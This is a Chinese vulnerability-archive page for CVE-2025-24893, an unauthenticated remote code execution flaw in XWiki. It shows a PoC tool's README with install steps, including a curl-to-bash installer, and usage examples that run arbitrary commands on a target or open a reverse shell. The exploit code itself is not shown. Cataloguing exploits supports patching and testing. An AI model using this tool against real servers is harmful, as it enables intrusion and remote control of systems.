目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2025-24893 PoC — XWiki Platform 安全漏洞

来源
关联漏洞
标题: XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。
介绍
# CVE-2025-24893

Install bun:

```bash
curl -fsSL https://bun.com/install | bash
```

To install dependencies:

```bash
bun install
```

To run:

```bash
bun run CVE-2025-24893.ts
```

This project was created using `bun init` in bun v1.2.19. [Bun](https://bun.com) is a fast all-in-one JavaScript runtime.

## How to use:

```
Usage: bun CVE-2025-24893.ts [options]

Options:
  -u, --url <url>           The target URL to interact with.
  -i, --ip <ip-address>     The IP address for a reverse shell connection.
  -p, --port <port-number>  The port number for the reverse shell.
  -r, --rverse              Open a reverse shell connection.
  -c, --cmd <command>       Execute a specific command.

Examples:
  # Execute a command on a target URL
  bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"

  # Open a reverse shell
  bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
```

## Disclaimer

This exploit and guide are for educational purposes only. Use this information responsibly and only on systems you have explicit permission to test. Unauthorized exploitation of systems is illegal and unethical. The authors and contributors are not responsible for any misuse or damage caused by this information.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →